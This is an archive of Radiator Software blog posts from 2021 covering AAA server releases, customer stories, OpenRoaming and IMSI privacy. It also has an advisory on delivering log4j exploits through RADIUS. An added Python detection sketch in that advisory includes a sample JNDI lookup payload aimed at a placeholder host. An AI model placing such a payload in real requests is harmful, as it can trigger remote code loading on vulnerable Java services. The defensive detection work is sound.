Monday, December 20, 2021

Radiator used for authentication in water monitoring

Water monitoring is important in all regions of the world. To have a clear overall picture of such a vital resource, it is necessary to have real-time data about river levels and flows, storage elevations and volumes, and water salinity.

Water monitoring organizations use remote sensor networks to monitor data such as reservoir levels, stream flows, and pipeline valve positions. Those sensors, often equipped with mobile data transceivers, are critical components of the water management system, and therefore need to be authenticated.

For one of our major customers in this field, we have provided a RADIUS authentication solution, using the Radiator AAA server to authenticate around 2000 devices currently in active service.

After the authentication is done, the sensors send their telemetry data to specialized data repositories for processing, analysis, and display, in order for customer organizations to know the real-time status of their water system.

Would you like to know more about using Radiator in device authentication?

If you are interested in using Radiator in device authentication, for example in telemetry or sensor networks, please do not hesitate to contact our sales team at sales@radiatorsoftware.com.

Radiator, being the most flexible AAA server in the market, may be just the solution for your authentication use case.

Monday, December 13, 2021

Radiator is not affected by log4j vulnerability

On the 10th of December 2021 a vulnerability (CVE-2021-44228) in a popular Java-based logging utility log4j was published. Since then we have received some customer queries about Radiator’s vulnerability.

Radiator does not utilise Java or log4j as a component of our software and is therefore not vulnerable to the log4j vulnerability.

While closely following the situation, research and responses around the vulnerability, we have identified that the RADIUS protocol and infrastructure can be used to deliver the exploit to more vulnerable services such as Java-based backend services, AAA information sources and centralised logging systems. We have documented the principle of this delivery method in a separate blog post found here:

https://blog.radiatorsoftware.com/2021/12/radius-servers-and-log4j-vulnerability.html

We will continue monitoring the issue closely and announce if issues affecting Radiator or Radiator services are found.

RADIUS servers and log4j vulnerability

On the 10th of December 2021 a vulnerability (CVE-2021-44228) in a popular Java-based logging utility log4j was published. While Radiator and some other RADIUS servers are not themselves vulnerable, log4j may be used in Java based user interfaces, log processors and many other supporting services and software. The systems and networks using RADIUS authentication can then be used to deliver the exploit to some other vulnerable services even if the exploit does not affect the RADIUS server systems directly.

Figure 1: RADIUS infrastructure as a delivery method for log4j exploits

The attacker can always try to exploit accessible network devices directly. Many network devices nowadays use Java based user interfaces and logging systems, which include log4j as a component and are therefore vulnerable to a direct attack. The attack can however reach deeper into backend services via RADIUS authentication without the need for the attacker to reach the actual backend services directly.

If the attacker is able to get the network device to add a suitable exploit payload to the RADIUS request, that payload can then be delivered through the RADIUS server to backend services and even outside one organisation. The payload does not affect the RADIUS servers themselves (unless they use Java and log4j) but RADIUS and RADIUS federations may be used as a delivery mechanism for exploits to reach more interesting targets.

Mitigating the risk by filtering and sanitising RADIUS attributes in RADIUS servers is likely to break more than it protects. It is more productive to focus on updating or possibly replacing the systems that use log4j than on trying to prevent the delivery of the exploit.
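As an added example (not Radiator code or configuration), the Python sketch below parses the attributes of a RADIUS Access-Request and reports text attributes that contain log4j lookup syntax (`${`), which gives visibility into which requests carried such values without filtering or altering them. The packets, the helper names and the choice of attributes to inspect are assumptions constructed for illustration.

```python
import struct

# Attribute types whose text value is supplied by the client or the network
# device (numbers from RFC 2865). Which ones to inspect is an assumption.
TEXT_ATTRS = {1: "User-Name", 30: "Called-Station-Id",
              31: "Calling-Station-Id", 32: "NAS-Identifier"}

def build_attr(attr_type, value):
    """Encode one attribute: type, length (including 2-byte header), value."""
    return struct.pack("!BB", attr_type, len(value) + 2) + value

def build_access_request(attrs, ident=1):
    """Constructed Access-Request (code 1) with a zeroed 16-byte authenticator."""
    body = b"".join(build_attr(t, v) for t, v in attrs)
    return struct.pack("!BBH", 1, ident, 20 + len(body)) + bytes(16) + body

def parse_attributes(packet):
    """Yield (type, value) pairs and reject malformed lengths."""
    if len(packet) < 20:
        raise ValueError("shorter than RADIUS header")
    _code, _ident, length = struct.unpack("!BBH", packet[:4])
    if length < 20 or length > len(packet):
        raise ValueError("bad packet length")
    pos = 20
    while pos < length:
        if pos + 2 > length:
            raise ValueError("truncated attribute header")
        attr_type, attr_len = packet[pos], packet[pos + 1]
        if attr_len < 2 or pos + attr_len > length:
            raise ValueError("bad attribute length")
        yield attr_type, packet[pos + 2:pos + attr_len]
        pos += attr_len

def find_lookup_syntax(packet):
    """Return [(attribute name, text)] for inspected attributes containing '${'."""
    hits = []
    for attr_type, value in parse_attributes(packet):
        name = TEXT_ATTRS.get(attr_type)
        text = value.decode("utf-8", errors="replace")
        if name and "${" in text:
            hits.append((name, text))
    return hits

# Constructed sample packets; example.invalid is a reserved, non-resolving name.
SUSPECT = build_access_request([
    (1, b"${jndi:ldap://example.invalid/a}"),
    (32, b"ap-lobby-01"),
])
BENIGN = build_access_request([
    (1, b"alice@example.org"),
    (31, b"00-11-22-33-44-55"),
])

if __name__ == "__main__":
    for label, pkt in (("suspect", SUSPECT), ("benign", BENIGN)):
        print(label, find_lookup_syntax(pkt))
```

A hit here says nothing about the RADIUS server itself; it points at the downstream Java-based services that will receive and log the value, which are the systems to update first.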


Friday, November 19, 2021

Companion to Radiator 4.26: SIM support 2.7 and Carrier module 1.7 released

We are very pleased to announce the release of Radiator SIM Module 2.7 and Radiator Carrier Module 1.7. This release is a companion to the most recent Radiator 4.26 version, and brings a number of fixes and enhancements to Diameter and SIGTRAN. IMSI privacy is now tested against the Wireless Broadband Alliance technical specification 'IMSI Privacy Protection for Wi-Fi'. Also included are a number of smaller enhancements and bug fixes.

For the full product history, please visit the Radiator SIM Module revision history and Radiator Carrier Module revision history.

Radiator packages are available to download for current licensees from the downloads page and the Radiator repository.

Access to download the latest release can be renewed by placing an online renewal order or contacting sales@radiatorsoftware.com


Radiator Carrier Pack is now known as Radiator Service Provider Pack.

Wednesday, November 17, 2021

Connect to OpenRoaming™ with Radiator

The Wireless Broadband Alliance (WBA) provides OpenRoaming™, a roaming federation service enabling an automatic and secure Wi-Fi experience globally. It creates a federation of networks and identity providers to enable automatic roaming and user onboarding on Wi-Fi. More information can be found on the WBA OpenRoaming™ pages or in the video below.

 

Recently, we have seen developments where carriers and other organisations, such as universities, are embracing OpenRoaming™ for their guest Wi-Fi access. This industry backing and focus on end user experience is one of the key benefits of OpenRoaming™.

As OpenRoaming™ becomes more integrated into Android and Apple devices, host organisations do not need to worry about how they will provide credentials for guests. Guests will already authenticate to guest networks with credentials from Apple, Google, participating operators and, in the future, even Facebook, without requiring host organisations to instruct them or provide configuration for their devices. For users, this development would bring significant benefits: secure and easy access to the Wi-Fi network wherever they go.

Radiator Software, being a WBA member and solution provider, can provide your organisation the products and services you need in order to join OpenRoaming™.

Radiator supports OpenRoaming™ requirements

OpenRoaming™ needs support for both the RadSec and DNSRoaming protocols in order to implement roaming securely and without extra effort for the end user. Radiator AAA Server supports both of these protocols, as can be seen from our product page. We are proud to say that Radiator was the first commercial AAA server to implement RadSec.

At the same time, we have 20 years of experience in providing roaming solutions to our Radiator customers, especially for international roaming federations such as eduroam and govroam. For these customers, we can of course provide assistance when joining OpenRoaming™.

Interested in joining OpenRoaming™ using Radiator?

For OpenRoaming™, our team can offer you a complete package: the software plus the installation and configuration assistance needed to join OpenRoaming™. After this, with Radiator support, you can ask for any further assistance, for example if configuration changes are needed.

Please contact our sales team at sales@radiatorsoftware.com

Friday, October 29, 2021

Radiator 4.26 now available

We are pleased to announce the release of Radiator version 4.26. This version contains new features, enhancements, and bug fixes. 

Selected compatibility notes, enhancements and fixes

  • TLSv1.3 is currently disabled for AuthBy DUO.
  • AuthBy SQLTOTP now supports CHAP, MSCHAP and MSCHAPv2. EAP-MSCHAPv2 is supported with MSCHAPv2 conversion. Encrypted PIN is now supported for PAP, EAP-OTP and EAP-GTC.
  • Radiator SIM Pack 2.7 and Carrier Pack 1.7, or later, are strongly recommended.

Known caveats and other notes

  • TLSv1.3 remains disabled by default for TLS based EAP methods and Stream based classes, such as RadSec.
  • EAP-FAST functionality is reported to vary between TLS versions, TLS library security level settings and client implementations.

More detailed changes can be found in the revision history.

Radiator packages are available to download for current licensees from the downloads page and the Radiator repository.

Access to download the latest release can be renewed by placing an online renewal order or contacting sales@radiatorsoftware.com


Friday, October 15, 2021

Radiator provides IMSI privacy for EAP-SIM, EAP-AKA and EAP-AKA’ authentication

In many high traffic areas such as sports stadiums, shopping venues, or public transport hubs, mobile carriers may partner with the local Wi-Fi providers to improve coverage and user experience: mobile devices can be automatically connected to Wi-Fi instead of congested cellular network. Internationally, Wi-Fi roaming agreements also allow carriers to lower the cellular roaming costs. 

EAP-SIM, EAP-AKA and EAP-AKA’ are SIM-based Wi-Fi authentication methods used to achieve seamless offloading to carrier and partner Wi-Fi, with International Mobile Subscriber Identifier (IMSI) derived from the SIM card acting as a unique identifier for each user. 

On the first ever connection to such a Wi-Fi network, the mobile device communicates its permanent subscriber identity information (IMSI), which is then sent to the home operator for authentication. This identity is sent in the clear. A potential 3rd party adversary installing a Wi-Fi sniffer in the vicinity of such networks can harvest permanent identities and track users. This tracking can also be done by the venue or network owner when connecting to the Wi-Fi network. 

Because of this, mobile operating systems such as iOS 15 will show the following warning when joining a Wi-Fi network without IMSI encryption: “your mobile subscriber identity will be exposed”. A similar situation can be seen in the pictures below. 

Privacy warning when authenticating to Wi-Fi network without IMSI encryption

 

Operators risk decreased user satisfaction for Wi-Fi offloading if transmitting IMSI in the open - it may cause users to feel their privacy is being compromised.

Radiator SIM Pack provides IMSI privacy protection 

The solution is to protect user privacy by implementing IMSI encryption for EAP-SIM, EAP-AKA and EAP-AKA’ authentication. As an operator, you can enable IMSI privacy easily: Radiator 3GPP AAA Server handles both encrypted and clear authentication requests. This means IMSI privacy can be offered to devices supporting it without affecting other users. 

Starting from revision 2.5, Radiator SIM Pack supports IMSI encryption as specified in 3GPP S3-170116 document “Privacy Protection for EAP-AKA” (zip), and WBA’s IMSI Privacy Protection for Wi-Fi – Technical Specification. The feature is already implemented by some of our operator customers to cover their AAA server encryption. 

The latest release of Radiator SIM Pack is available for new licensees and for licensed customers with valid download access. To find out if Radiator SIM Pack suits your needs, you can contact us at sales@radiatorsoftware.com and a member of our sales team will be happy to assist you. 

You can also contact us to renew your support contract and get access to the newest release. A full history of Radiator SIM Pack releases is available on our website.

Tuesday, October 5, 2021

Radiator and NCINGA - working together towards customer success

 

 

 

While Radiator has hundreds of operator customers all over the world, we also have an extensive network of integrator partners providing turn-key solutions for our customers. One of these trusted integrators is NCINGA.  As NCINGA is known to provide technology transformations in frontier markets, they also provide Radiator AAA solutions to operators and carriers especially in the APAC area.

This collaboration has provided solutions to customers both for fixed and wireless AAA. In
different use cases, the main focus in the cooperation has involved integrating Radiator
solutions with different vendor environments and network elements. Radiator is used for
example when applying policy and control functionalities for end user data plans.

    “With Radiator, we were able to quickly deliver complex AAA implementations. It was easy
    to configure and extend to the customers need. The Radiator Technical Support team made
    it even easier to implement & support with prompt responses and guidance.” 

    -Kokum Randeni, VP Sales, Ncinga

One of the key elements in the working model has been the flexibility in Radiator licensing:
the components needed by the customer can be tailored to the use case and number of
subscribers. This way the ROI for the customer can be ensured as they can add new
features of Radiator to use when needed.

For the customer, the operating model is quite easy and straightforward: NCINGA and their
team of experts provide the first level support and integration consultation, and the Radiator
team provides the product-related 2nd level support and consultation related to Radiator
specific configuration and other needs.

Would you like to know more about Radiator and NCINGA?

If you are looking for a carrier-grade AAA server with flexible options for different use cases,
please do not hesitate to contact our sales team at sales(a)radiatorsoftware.com. For
NCINGA, please contact their sales team at www.ncinga.net.


Examples of Radiator use include carrier-grade AAA, Wi-Fi offloading, integrating Diameter
online and offline charging with RADIUS-based infrastructure, integrating RADIUS
accounting with Diameter online and offline charging and much more. On top of that, our
support team has wide experience of various carrier use cases in different environments.

Tuesday, September 21, 2021

Customer reference: Salt Mobile SA using Radiator Policy and Charging Pack

Salt Mobile SA uses Radiator for their Diameter interfaces

 

Swiss mobile operator Salt Mobile SA (Salt), one of the top operators in Switzerland, has been using Radiator Policy and Charging Pack since late 2020 for their 2 million customers. The use case in Salt has evolved from initial use of Radiator Enterprise Pack to the use of Radiator Policy and Charging Pack. 

 

The flexibility of Radiator licensing models has provided cost-efficient, step-by-step licensing where additional modules have been added when needed. 


Salt has been using Radiator products for several years. Nowadays, Salt uses Policy and Charging Pack for the charging and accounting of their customers' pre-paid and post-paid plans. Radiator Telco Pack provides the Diameter Gy and Gx interfaces specified by the 3GPP to implement this:


“We use Radiator for our DATA and SMS real-time charging (using Gy Diameter protocol). It sits between our core network elements (SMSC/GGSN) and our online charging system. All our DATA and SMS traffic (national and roaming) is controlled using this flow. On top of that we use the control function (Gx) to apply throttling on the DATA flow for roaming.” 

-Annaick Rinderknecht, Devops Manager, IT, Salt Mobile

Would you like to know more? 


If you are looking for a carrier-grade AAA server with flexible options for different use cases, please do not hesitate to contact our sales team. 


For example, in the use case mentioned, Radiator Policy and Charging Pack extends Radiator by allowing direct connections to your 3GPP infrastructure through Diameter interfaces – a protocol commonly used in telecommunication systems. Radiator Policy and Charging Pack includes support for different policy and charging related interfaces and implementations specified by the 3GPP.

Examples of use include Wi-Fi offloading, integrating Diameter online and offline charging with RADIUS based infrastructure, integrating RADIUS accounting with Diameter online and offline charging and much more.

Our support team has wide experience of various carrier use cases in different environments and we are happy to help you in all your AAA needs.

Edit: Radiator Policy and Charging Pack was previously known as Radiator Telco Pack. The name of the product has been updated in the blog.

Wednesday, February 3, 2021

Radiator SIM Module 2.6 released

We are pleased to announce the release 2.6 of Radiator SIM Module. This release includes 3GPP emergency call support and overall enhanced 3GPP AAA Server support, as well as a number of enhancements and bug fixes. 

Customers with valid download access contracts can download updated software packages from our downloads site. Please note that Radiator 4.24 or later and Radiator Carrier Module 1.6 or later are required. 

If you would like to renew your download access contract, or need professional assistance with updating or migrating, please contact sales@radiatorsoftware.com and a member of our sales team will be happy to assist.

Revision 2.6 detailed updates and fixes:

  • Invalid APN formats are now rejected early.
  • Included APN match in S6b authorisation checks.
  • Fixed a crash in 3GPP AAA Server triggered by retransmitted messages.
  • Updated identity handling with IMSI encryption based on observed client behaviour.
  • RAT-Type for SWx requests is now set to the value received over SWm defaulting to VIRTUAL. Previously WLAN was always used by 3GPP AAA Server.
  • 3GPP-Charging-Characteristics is now copied to SWm answers when available. Subscription-Id was not added to SWm AAA messages after the user profile was updated by HSS with Push-Profile Request.
  • AAA-Failure-Indication is now sent over SWx to HSS. Previously the VSA was ignored when received from an ePDG.
  • Terminal-Information is now added to SWx requests as required by 29.273 version 13 and later.
  • Enhanced 3GPP AAA Server support to cover 29.273 version 15.4.0. The main behaviour change is S6b triggered PGW registration which is no longer done as often. This was clarified in 29.273 13.4.0 correction CP-160220 CR 0457.
  • Emergency services for authenticated users are now supported by 3GPP AAA Server. Support for emergency services needs to be enabled with a new configuration flag parameter EmergencyServices. When EmergencyServices parameter is set and SQL is used for a session database, one new column and SQL query modifications are needed.
  • Updated 3GPP AAA Server SWm, SWx and S6b dictionaries for 29.273 version 15.4.0.
  • Crypt::Rijndael is no longer required when Radius::UtilXS release 2.2 or later and Radiator 4.25 or later is installed.
  • 3GPP AAA Server SQL and Redis based session backends no longer trigger unnecessary lookups and SWx deregistration updates when session termination requests are received over SWm or S6b. This can reduce Diameter traffic significantly with certain configurations where lots of clients are not allowed to connect and gateway devices send STRs for these attempts.
  • Removed warnings logged to STDERR by 3GPP AAA Server when processing certain request types. These warnings were harmless but caused unnecessary log entries.
  • 3GPP AAA Server now supports stripping MAC address from NAI format usernames. A new optional configuration parameter StripMACFromUserName controls how this is done.
  • A number of code clean up and maintenance changes were done based on Perl::Critic and other tools.
  • Requires Radiator 4.24 or later and Carrier Module 1.6 or later with 3GPP AAA Server. Radiator 4.24 and later are recommended with plain EAP-SIM, EAP-AKA and EAP-AKA’.

For more information, you can see the Radiator SIM Pack product page or contact us directly at info@radiatorsoftware.com.